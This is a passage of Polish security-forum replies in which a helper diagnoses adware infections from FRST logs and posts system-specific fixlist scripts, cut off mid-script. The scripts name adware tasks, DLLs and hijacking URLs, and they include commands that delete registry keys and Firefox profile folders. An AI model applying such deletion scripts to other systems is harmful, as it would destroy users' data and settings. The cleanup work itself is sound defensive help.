Miszel03

W raportach brak oznak infekcji. Jedyne do czego można by się przyczepić to do zawartości pliku Hosts, ale to nie wygląda na modyfikacje infekcyjną, więc zostawiam.

W raportach brak oznak infekcji, w spoilerze działania poboczne, czysto kosmetyczne.

W raportach brak oznak infekcji. Potencjalnym sprawcą obciążenia może być oprogramowanie zabezpieczające, czyli Kaspersky Internet Security - wyłącz go i poobserwuj. Temat przenoszę do działu Windows 8.

W raportach brak oznak infekcji. Temat przenoszę do działu Windows 10, gdzie będziesz musiał sprecyzować bardziej problem z jakim boryka się Twój system - bo inaczej nie wiemy co trzeba zbadać. Na prośbę zadaje skrypt kasujący resztki po programach (patrz do spoileru).

Problem już znany, powodowany infekcją wariantem Adware.Elex, który modyfikuje usługę Themes dodając niestandardowe ustawienie DependOfService (i w systemie przypuszczalnie jest więcej infekcji typu adware). Zrób zestaw raportów systemowych FRST oraz GMER.

Kończymy. Usuń narzędzia diagnostyczno / dezynfekcyjne (są często aktualizowane, więc jednorazowe) oraz zaktualizuj ważne programy (zauważyłem nieaktualny/e program/y) - KLIK / KLIK.

System jest mocno zainfekowany przez nowoczesne adware / PUP. Zapoznaj się jak na przyszłość tego unikać - KLIK. 1. Przez panel sterowania odinstaluj: Traffic ExchangeNastępnie wejdź do wymienionych folderów: C:\Program Files (x86)\OneSystemCare, C:\Program Files (x86)\UCBrowser, C:\Program Files\żěŃą i z ich poziomu spróbuj uruchomić deinstalator (nazwa zbliżona do uninstall.exe). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {5604AB46-C0DE-41C2-A414-B66FF1EA90D2} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe Task: {5731C7E4-7072-4B38-937D-744D3093D2C5} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe Task: {5B93CF7C-CE84-4FCC-928D-4983335E96CB} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE Task: {654AB5EB-468E-42F5-A2B7-6C5808A66E5C} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-01-25] (UC Web Inc.) Task: {69C1D4A0-1278-4FC9-99E4-21F2C6F67140} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-01-18] (UCWeb Inc) Task: {B59E1B67-4CE1-4E63-91B0-C41453F02BD9} - \{040B0A47-0504-0E09-0E11-0F050C09110C} -> Brak pliku Task: {EDB5F224-6AD9-4CE8-90C5-9D13CD859491} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe Task: {F337806B-83B9-4D83-9FC2-CE3C0F370F21} - System32\Tasks\KuaiZip_Update => C:\Program Files\żěŃą\X86\Update.exe [2017-01-25] (Shanghai Guangle Network Technology Ltd) Task: C:\Windows\Tasks\One System CarePeriod.job => Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\And-solar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\AND-SO~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ ShortcutWithArgument: C:\Users\And-solar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\AND-SO~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\AND-SO~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\AND-SO~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ HKU\S-1-5-18\...\Run: [] => 0 HKLM\...\Providers\h49mkssl: C:\Program Files (x86)\Ckerbulemahitain Provider\local64spl.dll [289792 2017-01-25] () C:\Program Files (x86)\Ckerbulemahitain Provider AppInit_DLLs: C:\ProgramData\Hotfresh\Silsaofind.dll => C:\ProgramData\Hotfresh\Silsaofind.dll [358912 2017-01-25] () AppInit_DLLs-x32: C:\ProgramData\Hotfresh\Zertraxflex.dll => C:\ProgramData\Hotfresh\Zertraxflex.dll [248320 2017-01-25] () C:\ProgramData\Hotfresh ShellExecuteHooks: Brak nazwy - {D1CD7500-DE3D-11E6-8016-64006A5CFC23} - C:\Users\And-solar\AppData\Roaming\Jevush\Pafght.dll -> Brak pliku ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-01-25] () C:\Program Files\żěŃą HKU\S-1-5-21-2197181866-4104514059-3983876984-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ01aseP6BKgcPHAlawRJj7myJ0pCVpASHr1KDIC_9wV4vYcvNop4LvCN49ico56bKqIxw0emTTEBRgbLH6i5Z6UnLvJytGZOJP8UN7PoyLH61K-Chrtb2OUu4gu0H4dhLQCoRrs5eND9yn6NsggDvbI6-OaA,,&q={searchTerms} HKU\S-1-5-21-2197181866-4104514059-3983876984-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-2197181866-4104514059-3983876984-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://services.eshield.com/general/newhometab.php?hometab=home&partner=11433&guid={1098AC46-4C1F-4B32-8C47-9DE4752AA8AC}&i= SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ01aseP6BKgcPHAlawRJj7myJ0pCVpASHr1KDIC_9wV4vYcvNop4LvCN49ico56bKqIxw0emTTEBRgbLH6i5Z6UnLvJytGZOJP8UN7PoyLH61K-Chrtb2OUu4gu0H4dhLQCoRrs5eND9yn6NsggDvbI6-OaA,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-2197181866-4104514059-3983876984-1001 -> {29726C30-E2D0-4957-AE6E-20F479C75CFA} URL = hxxp://services.eshield.com/tb/search.php?guid={1098AC46-4C1F-4B32-8C47-9DE4752AA8AC}&k={searchTerms}&action=default_search SearchScopes: HKU\S-1-5-21-2197181866-4104514059-3983876984-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ01aseP6BKgcPHAlawRJj7myJ0pCVpASHr1KDIC_9wV4vYcvNop4LvCN49ico56bKqIxw0emTTEBRgbLH6i5Z6UnLvJytGZOJP8UN7PoyLH61K-Chrtb2OUu4gu0H4dhLQCoRrs5eND9yn6NsggDvbI6-OaA,,&q={searchTerms} R2 Bisawardtusocult; C:\Program Files (x86)\Rajuvokos\Jwocultmonitor.dll [150016 2017-01-25] () [brak podpisu cyfrowego] R2 NewBlueCkerbulemahitainProvider; C:\Program Files (x86)\Ckerbulemahitain Provider\NewBlueCkerbulemahitainProvider.dll [225280 2017-01-25] () [brak podpisu cyfrowego] S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a S2 Hotfresh; C:\ProgramData\\Hotfresh\\Hotfresh.exe shuz -f "C:\ProgramData\\Hotfresh\\Hotfresh.dat" -l -a C:\ProgramData\\CloudPrinter\ S1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [23652 ] (UC Web Inc.) S3 dbx; system32\DRIVERS\dbx.sys [X] 2017-01-25 14:22 - 2017-01-25 14:22 - 07316480 _____ C:\Users\And-solar\AppData\Roaming\agent.dat 2017-01-25 14:22 - 2017-01-25 14:22 - 01908124 _____ C:\Users\And-solar\AppData\Roaming\Stronglux.tst 2017-01-25 14:22 - 2017-01-25 14:22 - 00126464 _____ C:\Users\And-solar\AppData\Roaming\noah.dat 2017-01-25 14:22 - 2017-01-25 14:22 - 00126464 _____ C:\Users\And-solar\AppData\Roaming\lobby.dat 2017-01-25 14:22 - 2017-01-25 14:22 - 00072787 _____ C:\Users\And-solar\AppData\Roaming\Stim-Zap.tst 2017-01-25 14:22 - 2017-01-25 14:22 - 00070752 _____ C:\Users\And-solar\AppData\Roaming\Config.xml 2017-01-25 14:22 - 2017-01-25 14:22 - 00054272 _____ C:\Users\And-solar\AppData\Roaming\ApplicationHosting.dat 2017-01-25 14:22 - 2017-01-25 14:22 - 00018432 _____ C:\Users\And-solar\AppData\Roaming\Main.dat 2017-01-25 14:22 - 2017-01-25 14:22 - 00005568 _____ C:\Users\And-solar\AppData\Roaming\md.xml 2017-01-25 14:22 - 2017-01-25 14:22 - 00002398 _____ C:\Windows\SysWOW64\findit.xml 2017-01-25 14:22 - 2017-01-25 15:17 - 0391504 _____ () C:\Users\And-solar\AppData\Roaming\Tantoin.bin 2017-01-25 14:21 - 2017-01-25 14:21 - 0016560 _____ () C:\Users\And-solar\AppData\Roaming\InstallationConfiguration.xml DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\And-solar\AppData\Local\Mozilla\Firefox C:\Users\And-solar\AppData\Roaming\Mozilla\Firefox C:\Users\And-solar\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Otwórz Google Chrome: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > utwórz nową Osobę, zaloguj się na nią > wejdź ponownie do opcji i skasuj wszystkie poprzednie Osoby. 4. Pobierz AdwCleaner uruchom go i kliknij szukaj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W raportach brak oznak infekcji, więc spowolnienie to sprawa infekcji. Temat przenoszę do działu Windows 8. W spoilerze kosmetyka, działania poboczne.

Wszystkie wykryte zagrożenia przez AdwCleaner daj do kasacji (używając opcji Oczyść). Podsumuj obecny stan systemu.

Podziwiam, za chęć robienia tego ręcznie ( ). W wersji próbnej jest to program tylko do skanowania, ale jak podasz jakiś adres email to masz za darmo 15 dniowy okres próbny - jak go aktywujesz usuń znalezione zagrożenia za pomocą tego właśnie narzędzia. Komentując zaś raport AdwCleaner to wszystkie detekcje daj do usunięcia (używając opcji Oczyść). Po wykonaniu powyższych zadań dostarcz nowe raporty.

System zanieczyszczone programami adware / PUP. Na szczęście to niewyrafinowane gadziny (bo np. to co teraz wyrabia wariant Adware.Elex przechodzi ludzkie pojęcie), więc szybko je stąd wywalimy. 1. Przez panel sterowania odinstaluj: ByteFence Anti-Malware PremierOpinion Run_Dregol Wejdź do folderu c:\Program Files (x86)\Super Optimizer, a następnie z jego poziomu spróbuj uruchomić plik deinstalacyjny (nazwa zbliżona do uninstall.exe). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia - Chrome GroupPolicyScripts-x32: Ograniczenia CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1438283286&z=0b1bfe4a24b08a9d7a9448fg4z4c2b1obb0cdoac0g&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1438283286&z=0b1bfe4a24b08a9d7a9448fg4z4c2b1obb0cdoac0g&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hppp&ts=1438283363&z=df9f3771dbf51faf301f6c0gbz3cbb3o9b3c0c2eam&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hppp&ts=1438283363&z=df9f3771dbf51faf301f6c0gbz3cbb3o9b3c0c2eam&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1438283286&z=0b1bfe4a24b08a9d7a9448fg4z4c2b1obb0cdoac0g&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1438283286&z=0b1bfe4a24b08a9d7a9448fg4z4c2b1obb0cdoac0g&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} HKU\S-1-5-21-3211495807-2250388596-1896275332-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=dspp&ts=1438283363&z=df9f3771dbf51faf301f6c0gbz3cbb3o9b3c0c2eam&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} HKU\S-1-5-21-3211495807-2250388596-1896275332-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=dspp&ts=1438283363&z=df9f3771dbf51faf301f6c0gbz3cbb3o9b3c0c2eam&from=cor&uid=WDCXWD5000AAKS-00V1A0_WD-WMAWF204686646866&q={searchTerms} SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.dregol.com/results.php?f=4&q={searchTerms}&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0B0CyD0F0FyEtC0FtCyCyByDtA0EzyyEtN0D0Tzu0StCtByCtCtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StC0F0FtA0A0CyCyDtGtByB0CtBtG0CtCzz0CtGyC0E0D0FtGzzyEyEtAtB0C0BtD0AyDyDyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0AtB0AyByByByCtGzytCtA0CtGyEtA0E0BtG0A0DtA0BtGzzzz0EtA0AyEzztBzz0CtAtA2QtN0A0LzutBtN1B2Z1V1T1S1NzuzztByD&cr=1346100435&ir= SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll => Brak pliku CHR Extension: (RescueTime for Chrome ChromeOS) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\bdakmnplckeopfghnlpocafcepegjeap [2015-07-13] [updateUrl: hxxps://epicunitscan.info/00service/update2/crx] CHR Extension: (Smart Pause for YouTube) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\dcflkimagfnicklojfonbbcppnikogih [2015-07-29] [updateUrl: hxxps://epicunitscan.info/00service/update2/crx] CHR Extension: (InstaBrowser) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\ighkeghglkbljjmoineeppdkailinjii [2015-08-01] [updateUrl: hxxps://epicunitscan.info/00service/update2/crx] CHR Extension: (Adblock for Pirate Bay) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\imkpamgpfalmdaikobnkefcmmkpgljjd [2015-07-22] [updateUrl: hxxps://epicunitscan.info/00service/update2/crx] CHR Extension: (RDS bar seo pagerank dmoz alexa pr) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\jlipcaflaocihnmlhnhcfombgmmfglho [2015-07-23] [updateUrl: hxxps://epicunitscan.info/00service/update2/crx] CHR Extension: (dregol New Tab) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\ihokndmjeombjojnfkmapfnjeghjohim [2016-10-30] CHR Extension: (Palikan New Tab) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\ljibkigjccbegnbeojkoafejpoiachej [2016-10-30] S2 cae99edb; "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Super Optimizer\SupOptStats.dll",ENT c:\Program Files (x86)\Super Optimizer C:\Windows\SysWOW64\mfc100jpn.dll U0 aswVmm; Brak ImagePath Task: {3943B91F-B318-410F-9279-FFAE73C5CD45} - System32\Tasks\{972A8D6B-B63A-45F4-97B3-13B86E4688D8} => pcalua.exe -a C:\Users\Adam\AppData\Local\Temp\jre-8u51-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 Task: {CEC5C7B8-E1CF-4878-9A7B-6D85AFFE01AA} - System32\Tasks\Super Optimizer Schedule => C:\Program Files (x86)\Super Optimizer\SupOptLauncher.exe ShortcutWithArgument: C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\Lucidchart Schematy - Desktop.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 4" --app-id=djejicklhojeokkfmdelnempiecmdomj ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\48499db33039e897\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 4" C:\Users\Adam\Desktop\zdiecia ola\Farming Simulator 15 Gold Edition.lnk C:\Users\Adam\Desktop\róznosci\Opera.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Super Optimizer\Sprawdz aktualizacje.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Super Optimizer\Super Optimizer.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments\Traktor DJ Studio 3\Traktor DJ Studio 3.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Komputerowa Gratka\Zimowa Olimpiada.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Komputerowa Gratka\Odinstaluj gry\Odinstaluj - Zimowa Olimpiada.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Komputerowa Gratka\Informacje dla rodziców\Zimowa Olimpiada - informacje dla rodziców.lnk Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Super Optimizer" /f DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Adam\AppData\Local\Mozilla C:\Users\Adam\AppData\Roaming\Mozilla C:\Users\Adam\AppData\Roaming\Profiles Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Pobierz AdwCleaner uruchom go i kliknij szukaj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W systemie aktywna świeża infekcja uruchamiana poprzez Shell, widać również elementy adware / PUP. Jeśli chodzi o problem z uruchomieniem AdwCleanera (błąd sqlite) to należy go przeinstalować używając dedykowanej do tego opcji Odinstaluj w programie, następnie moża pobrać narzędzie z dedykowanej strony i działać (ale to na przyszłość, teraz trzymasz się tylko moich zaleceń). 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Winlogon: [shell] [0 ] () HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM-x32 -> DefaultScope - brak wartości SearchScopes: HKU\S-1-5-21-1274947860-2014668213-2371505907-1000 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = hxxp://www.daemon-search.com/search?q={searchTerms} Toolbar: HKLM - Brak nazwy - {32099AAC-C132-4136-9E9A-4E364A424E17} - Brak pliku Toolbar: HKU\S-1-5-21-1274947860-2014668213-2371505907-1000 -> Brak nazwy - {32099AAC-C132-4136-9E9A-4E364A424E17} - Brak pliku DefaultPrefix-x32: => Prefixes-x32: [home]=> Prefixes-x32: [www]=> S2 AODDriver4.3; \??\C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] U3 idsvc; Brak ImagePath U3 wpcsvc; Brak ImagePath C:\Users\Admin\Documents\Euro Truck Simulator 2\readme.rtf.lnk C:\Users\Admin\Desktop\Jakub\Programy\Action!.lnk C:\Users\Admin\Desktop\Jakub\Programy\Windows Movie Maker 2.6.lnk C:\Users\Admin\Desktop\Jakub\GTA SA\MTA San Andreas 1.4.lnk C:\Users\Admin\Desktop\Jakub\GTA SA\GTA SAN ANDREAS\MTA San Andreas 1.3.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Admin\AppData\Local\Mozilla C:\Users\Admin\AppData\Roaming\Mozilla C:\Users\Admin\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

1. Wszystkie wykryte zagrożenia przez MBAM daj do kasacji. 2. Programy, które stawiają opór przy deinstalacji spróbj odinstalować przy pomocy Microsoft Program Install and Uninstall Troubleshooter. 3. Zrób nowy zestaw raportów FRST.

Uważaj na te "magiczne" programy naprawiające wszystko, to najczęściej programu o bardzo wątpliwej reputacji, a nawet fałszywe programy. Zapoznaj się również z lekturą jak uniknąć nieciekawych przygód z adware / PUP - Portale z oprogramowaniem / Instalatory - na co uważać. W systemie spory bałagan, ale wszystko łatwo da się uporządkować. Jeśli chodzi o problem tytułowy to to co Ty piszesz pokrywa się praktycznie w całości z tym co ja widzę w raportach - więc nie będzie problemów z usunięciem tego. Akcja. 1. Włącz przywracanie systemu (aktualnie jest wyłączone). 2. Przez panel sterowania odinstaluj: My Web Shield 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {2082DEC8-B85C-47D2-BE40-FC0D32CBD49A} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {23E1684E-22F5-4D27-A00A-28FE9E0BB857} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {49B263C3-9405-44CE-AA40-E743411A34C8} - System32\Tasks\CreateChoiceProcessTask => C:\Windows\System32\browserchoice.exe Task: {687ED4DC-4301-4FB7-93D9-C2452CC3E77F} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Brak pliku Task: {6A7CFCED-FEC5-4EEF-A3B0-33E736587630} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {6F9EE597-D177-4659-85A5-57E7D9110E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {80599B41-A09E-4E6B-8EB0-FEF0EFD9BA55} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {84743446-09C5-4A12-8AEA-FAF7476585BA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {B7181595-D120-4C4D-A856-3F001000DA47} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku Task: {CB3D8087-7D43-4C63-91C9-BBE32CC05EC4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {CF23F961-33AB-43FB-9C41-F34C63574E42} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {DA2BB657-E7F1-4692-AE1F-993D2C3B554F} - 